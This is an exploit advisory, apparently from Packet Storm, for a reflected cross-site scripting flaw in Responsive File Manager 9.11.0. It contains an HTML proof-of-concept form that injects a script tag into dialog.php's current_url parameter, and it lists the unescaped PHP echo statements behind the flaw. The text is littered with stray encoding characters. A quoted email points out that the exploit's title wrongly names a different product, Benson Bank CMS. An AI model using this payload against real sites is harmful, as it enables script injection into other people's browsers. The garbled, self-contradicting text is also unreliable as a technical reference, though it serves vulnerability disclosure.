Responsive File Manager version 9.11.0 suffers from a cross site scripting vulnerability.
7f7ce38cc78f93242a74a8859b055f73ca4783acbc3403a97eae45a277641f05
*=============================================================|
| Exploit Title: ResponsiveFilemanager Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.responsivefilemanager.com/
|
| Download Link : https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
|
| Version : v9.11.0
|
| Tested on: Kali Linux
|
| Date: 1 /10 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
|A A A <TITLE>ResponsiveFilemanage Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php" method="get">
| <input type="hidden" id="current_url" value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
|</form>
|</BODY>
|</HTML>
*=======================|
|How to fix this vulnerability :
|
|You should first try to f.ilter all input variables O After use command echo in script :)
|
*=======================|
|Vulnerable code :
|
|<body>
|A A A <input type="hidden" id="ftp" value="<?php echo !!$ftp; ?>" />
|A A A <input type="hidden" id="popup" value="<?php echo $popup;?>" />
|A A A <input type="hidden" id="callback" value="<?php echo $callback; ?>" />A A A
|A A A <input type="hidden" id="crossdomain" value="<?php echo $crossdomain;?>" />
|A A A <input type="hidden" id="editor" value="<?php echo $editor;?>" />
|A A A <input type="hidden" id="view" value="<?php echo $view;?>" />
|A A A <input type="hidden" id="subdir" value="<?php echo $subdir;?>" />
|A A A <input type="hidden" id="field_id" value="<?php echo $field_id;?>" />
|A A A <input type="hidden" id="type_param" value="<?php echo $type_param;?>" />
|A A A <input type="hidden" id="upload_dir" value="<?php echo $upload_dir;?>" />
|A A A <input type="hidden" id="cur_dir" value="<?php echo $cur_dir;?>" />
|A A A <input type="hidden" id="cur_dir_thumb" value="<?php echo $thumbs_path.$subdir;?>" />
|A A A <input type="hidden" id="insert_folder_name" value="<?php echo trans('Insert_Folder_Name');?>" />
|A A A <input type="hidden" id="new_folder" value="<?php echo trans('New_Folder');?>" />
|A A A <input type="hidden" id="ok" value="<?php echo trans('OK');?>" />
|A A A <input type="hidden" id="cancel" value="<?php echo trans('Cancel');?>" />
|A A A <input type="hidden" id="rename" value="<?php echo trans('Rename');?>" />
|A A A <input type="hidden" id="lang_duplicate" value="<?php echo trans('Duplicate');?>" />
|A A A <input type="hidden" id="duplicate" value="<?php if($duplicate_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="base_url" value="<?php echo $base_url?>"/>
|A A A <input type="hidden" id="ftp_base_url" value="<?php echo $ftp_base_url?>"/>
|A A A <input type="hidden" id="fldr_value" value="<?php echo $subdir;?>"/>
|A A A <input type="hidden" id="sub_folder" value="<?php echo $rfm_subfolder;?>"/>
|A A A <input type="hidden" id="return_relative_url" value="<?php echo $return_relative_url == true ? 1 : 0;?>"/>
|A A A <input type="hidden" id="lazy_loading_file_number_threshold" value="<?php echo $lazy_loading_file_number_threshold?>"/>
|A A A <input type="hidden" id="file_number_limit_js" value="<?php echo $file_number_limit_js;?>" />
|A A A <input type="hidden" id="sort_by" value="<?php echo $sort_by;?>" />
|A A A <input type="hidden" id="descending" value="<?php echo $descending?1:0;?>" />
|A A A <input type="hidden" id="current_url" value="<?php echo str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>" />
|A A A <input type="hidden" id="lang_show_url" value="<?php echo trans('Show_url');?>" />
|A A A <input type="hidden" id="copy_cut_files_allowed" value="<?php if($copy_cut_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="copy_cut_dirs_allowed" value="<?php if($copy_cut_dirs) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="copy_cut_max_size" value="<?php echo $copy_cut_max_size;?>" />
|A A A <input type="hidden" id="copy_cut_max_count" value="<?php echo $copy_cut_max_count;?>" />
|A A A <input type="hidden" id="lang_copy" value="<?php echo trans('Copy');?>" />
|A A A <input type="hidden" id="lang_cut" value="<?php echo trans('Cut');?>" />
|A A A <input type="hidden" id="lang_paste" value="<?php echo trans('Paste');?>" />
|A A A <input type="hidden" id="lang_paste_here" value="<?php echo trans('Paste_Here');?>" />
|A A A <input type="hidden" id="lang_paste_confirm" value="<?php echo trans('Paste_Confirm');?>" />
|A A A <input type="hidden" id="lang_files" value="<?php echo trans('Files');?>" />
|A A A <input type="hidden" id="lang_folders" value="<?php echo trans('Folders');?>" />
|A A A <input type="hidden" id="lang_files_on_clipboard" value="<?php echo trans('Files_ON_Clipboard');?>" />
|A A A <input type="hidden" id="clipboard" value="<?php echo ((isset($_SESSION['RF']['clipboard']['path']) && trim($_SESSION['RF']['clipboard']['path']) != null) ? 1 : 0);?>" />
|A A A <input type="hidden" id="lang_clear_clipboard_confirm" value="<?php echo trans('Clear_Clipboard_Confirm');?>" />
|A A A <input type="hidden" id="lang_file_permission" value="<?php echo trans('File_Permission');?>" />
|A A A <input type="hidden" id="chmod_files_allowed" value="<?php if($chmod_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="chmod_dirs_allowed" value="<?php if($chmod_dirs) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="lang_lang_change" value="<?php echo trans('Lang_Change');?>" />
|A A A <input type="hidden" id="edit_text_files_allowed" value="<?php if($edit_text_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="lang_edit_file" value="<?php echo trans('Edit_File');?>" />
|A A A <input type="hidden" id="lang_new_file" value="<?php echo trans('New_File');?>" />
|A A A <input type="hidden" id="lang_filename" value="<?php echo trans('Filename');?>" />
|A A A <input type="hidden" id="lang_file_info" value="<?php echo fix_strtoupper(trans('File_info'));?>" />
|A A A <input type="hidden" id="lang_edit_image" value="<?php echo trans('Edit_image');?>" />
|A A A <input type="hidden" id="lang_error_upload" value="<?php echo trans('Error_Upload');?>" />
|A A A <input type="hidden" id="lang_select" value="<?php echo trans('Select');?>" />
|A A A <input type="hidden" id="lang_extract" value="<?php echo trans('Extract');?>" />
|A A A <input type="hidden" id="transliteration" value="<?php echo $transliteration?"true":"false";?>" />
|A A A <input type="hidden" id="convert_spaces" value="<?php echo $convert_spaces?"true":"false";?>" />
|A A A <input type="hidden" id="replace_with" value="<?php echo $convert_spaces? $replace_with : "";?>" />
|A A A <input type="hidden" id="lower_case" value="<?php echo $lower_case?"true":"false";?>" />
|A A A <input type="hidden" id="show_folder_size" value="<?php echo $show_folder_size;?>" />
|A A A <input type="hidden" id="add_time_to_img" value="<?php echo $add_time_to_img;?>" />
|
*=============================================================|
| Special Thanks To : Ehsan Cod3r O micle O Und3rgr0und O Amir.ght O
| xenotixO modiretO V For Vendetta O Alireza O r4ouf O Spoofer O
| And All Of My Friends O The Last One : My Self, M.R.S.L.YA
*=============================================================|
From: Packet Storm <packet@packetstormsecurity.com>
To: aaNc Kha! aa <nc_521@yahoo.com>
Sent: Wednesday, 11 January 2017, 6:40:19
Subject: Re: ResponsiveFilemanager Cross Site Scripting
Why does one part say Benson Bank CMS and another ResponsiveFileManager?
On Tue, Jan 10, 2017 at 02:52:42PM +0000, aaNc Kha! aa wrote:
> *=============================================================|
> |A ExploitA Title:A ResponsiveFilemanagerA CrossA SiteA Scripting
> |
> |A ExploitA Author:A AshiyaneA DigitalA SecurityA Team
> |
> |A VendorA Homepage:A http://www.responsivefilemanager.com/
> |
> |A DownloadA LinkA :A https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
> |
> |A VersionA :A v9.11.0
> |
> |A TestedA on:A KaliA Linux
> |
> |A Date:A 1A /10A /A 2017
> *=============================================================|
> |A ExploitA Code:
> |
> |<HTML>
> |<HEAD>
> |A A A A <TITLE>BensonA BankA CMSA vA 5.5A -A 2015.09.09A CrossA SiteA Scripting</TITLE>
> |</HEAD>
> |<BODY>
> |<formA action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php"A method="get">
> |A <inputA type="hidden"A id="current_url"A value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
> |</form>
> |</BODY>
> |</HTML>
> *=======================|
> |HowA toA fixA thisA vulnerabilityA :
> |
> |YouA shouldA firstA tryA toA f.ilterA allA inputA variablesA OA AfterA useA commandA echoA inA scriptA :)
> |
> *=======================|
> |VulnerableA codeA :
> |
> |<body>
> |A A A A <inputA type="hidden"A id="ftp"A value="<?phpA echoA !!$ftp;A ?>"A />
> |A A A A <inputA type="hidden"A id="popup"A value="<?phpA echoA $popup;?>"A />
> |A A A A <inputA type="hidden"A id="callback"A value="<?phpA echoA $callback;A ?>"A />A A A A
> |A A A A <inputA type="hidden"A id="crossdomain"A value="<?phpA echoA $crossdomain;?>"A />
> |A A A A <inputA type="hidden"A id="editor"A value="<?phpA echoA $editor;?>"A />
> |A A A A <inputA type="hidden"A id="view"A value="<?phpA echoA $view;?>"A />
> |A A A A <inputA type="hidden"A id="subdir"A value="<?phpA echoA $subdir;?>"A />
> |A A A A <inputA type="hidden"A id="field_id"A value="<?phpA echoA $field_id;?>"A />
> |A A A A <inputA type="hidden"A id="type_param"A value="<?phpA echoA $type_param;?>"A />
> |A A A A <inputA type="hidden"A id="upload_dir"A value="<?phpA echoA $upload_dir;?>"A />
> |A A A A <inputA type="hidden"A id="cur_dir"A value="<?phpA echoA $cur_dir;?>"A />
> |A A A A <inputA type="hidden"A id="cur_dir_thumb"A value="<?phpA echoA $thumbs_path.$subdir;?>"A />
> |A A A A <inputA type="hidden"A id="insert_folder_name"A value="<?phpA echoA trans('Insert_Folder_Name');?>"A />
> |A A A A <inputA type="hidden"A id="new_folder"A value="<?phpA echoA trans('New_Folder');?>"A />
> |A A A A <inputA type="hidden"A id="ok"A value="<?phpA echoA trans('OK');?>"A />
> |A A A A <inputA type="hidden"A id="cancel"A value="<?phpA echoA trans('Cancel');?>"A />
> |A A A A <inputA type="hidden"A id="rename"A value="<?phpA echoA trans('Rename');?>"A />
> |A A A A <inputA type="hidden"A id="lang_duplicate"A value="<?phpA echoA trans('Duplicate');?>"A />
> |A A A A <inputA type="hidden"A id="duplicate"A value="<?phpA if($duplicate_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="base_url"A value="<?phpA echoA $base_url?>"/>
> |A A A A <inputA type="hidden"A id="ftp_base_url"A value="<?phpA echoA $ftp_base_url?>"/>
> |A A A A <inputA type="hidden"A id="fldr_value"A value="<?phpA echoA $subdir;?>"/>
> |A A A A <inputA type="hidden"A id="sub_folder"A value="<?phpA echoA $rfm_subfolder;?>"/>
> |A A A A <inputA type="hidden"A id="return_relative_url"A value="<?phpA echoA $return_relative_urlA ==A trueA ?A 1A :A 0;?>"/>
> |A A A A <inputA type="hidden"A id="lazy_loading_file_number_threshold"A value="<?phpA echoA $lazy_loading_file_number_threshold?>"/>
> |A A A A <inputA type="hidden"A id="file_number_limit_js"A value="<?phpA echoA $file_number_limit_js;?>"A />
> |A A A A <inputA type="hidden"A id="sort_by"A value="<?phpA echoA $sort_by;?>"A />
> |A A A A <inputA type="hidden"A id="descending"A value="<?phpA echoA $descending?1:0;?>"A />
> |A A A A <inputA type="hidden"A id="current_url"A value="<?phpA echoA str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>"A />
> |A A A A <inputA type="hidden"A id="lang_show_url"A value="<?phpA echoA trans('Show_url');?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_files_allowed"A value="<?phpA if($copy_cut_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_dirs_allowed"A value="<?phpA if($copy_cut_dirs)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_max_size"A value="<?phpA echoA $copy_cut_max_size;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_max_count"A value="<?phpA echoA $copy_cut_max_count;?>"A />
> |A A A A <inputA type="hidden"A id="lang_copy"A value="<?phpA echoA trans('Copy');?>"A />
> |A A A A <inputA type="hidden"A id="lang_cut"A value="<?phpA echoA trans('Cut');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste"A value="<?phpA echoA trans('Paste');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste_here"A value="<?phpA echoA trans('Paste_Here');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste_confirm"A value="<?phpA echoA trans('Paste_Confirm');?>"A />
> |A A A A <inputA type="hidden"A id="lang_files"A value="<?phpA echoA trans('Files');?>"A />
> |A A A A <inputA type="hidden"A id="lang_folders"A value="<?phpA echoA trans('Folders');?>"A />
> |A A A A <inputA type="hidden"A id="lang_files_on_clipboard"A value="<?phpA echoA trans('Files_ON_Clipboard');?>"A />
> |A A A A <inputA type="hidden"A id="clipboard"A value="<?phpA echoA ((isset($_SESSION['RF']['clipboard']['path'])A &&A trim($_SESSION['RF']['clipboard']['path'])A !=A null)A ?A 1A :A 0);?>"A />
> |A A A A <inputA type="hidden"A id="lang_clear_clipboard_confirm"A value="<?phpA echoA trans('Clear_Clipboard_Confirm');?>"A />
> |A A A A <inputA type="hidden"A id="lang_file_permission"A value="<?phpA echoA trans('File_Permission');?>"A />
> |A A A A <inputA type="hidden"A id="chmod_files_allowed"A value="<?phpA if($chmod_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="chmod_dirs_allowed"A value="<?phpA if($chmod_dirs)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="lang_lang_change"A value="<?phpA echoA trans('Lang_Change');?>"A />
> |A A A A <inputA type="hidden"A id="edit_text_files_allowed"A value="<?phpA if($edit_text_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="lang_edit_file"A value="<?phpA echoA trans('Edit_File');?>"A />
> |A A A A <inputA type="hidden"A id="lang_new_file"A value="<?phpA echoA trans('New_File');?>"A />
> |A A A A <inputA type="hidden"A id="lang_filename"A value="<?phpA echoA trans('Filename');?>"A />
> |A A A A <inputA type="hidden"A id="lang_file_info"A value="<?phpA echoA fix_strtoupper(trans('File_info'));?>"A />
> |A A A A <inputA type="hidden"A id="lang_edit_image"A value="<?phpA echoA trans('Edit_image');?>"A />
> |A A A A <inputA type="hidden"A id="lang_error_upload"A value="<?phpA echoA trans('Error_Upload');?>"A />
> |A A A A <inputA type="hidden"A id="lang_select"A value="<?phpA echoA trans('Select');?>"A />
> |A A A A <inputA type="hidden"A id="lang_extract"A value="<?phpA echoA trans('Extract');?>"A />
> |A A A A <inputA type="hidden"A id="transliteration"A value="<?phpA echoA $transliteration?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="convert_spaces"A value="<?phpA echoA $convert_spaces?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="replace_with"A value="<?phpA echoA $convert_spaces?A $replace_withA :A "";?>"A />
> |A A A A <inputA type="hidden"A id="lower_case"A value="<?phpA echoA $lower_case?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="show_folder_size"A value="<?phpA echoA $show_folder_size;?>"A />
> |A A A A <inputA type="hidden"A id="add_time_to_img"A value="<?phpA echoA $add_time_to_img;?>"A />
> |
> *=============================================================|
> |A SpecialA ThanksA ToA :A EhsanA Cod3rA OA micleA OA Und3rgr0undA OA Amir.ghtA O
> |A xenotixOA modiretOA VA ForA VendettaA OA AlirezaA OA r4oufA OA SpooferA O
> |A AndA AllA OfA MyA FriendsA OA TheA LastA OneA :A MyA Self,A M.R.S.L.YA A
> *=============================================================|